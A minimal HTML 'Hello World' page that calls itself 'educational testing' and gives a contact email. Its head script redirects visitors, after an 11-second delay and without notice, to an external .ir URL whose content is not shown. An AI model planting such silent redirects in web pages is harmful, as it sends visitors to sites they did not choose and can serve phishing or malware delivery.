<!DOCTYPE html>
<html>
<head>
<SCRIPT language="JavaScript">
setTimeout(function(){location.href="http://2ssa.ir/public/prneo/"} , 11000);   
</SCRIPT>
</head>
<body>
<h1>Hello World</h1>
<p>This is for educational testing & Please kindly contact If there is any problem or need upgrade: shahryar.barani@webraymon.com</p>
</body>
</html>
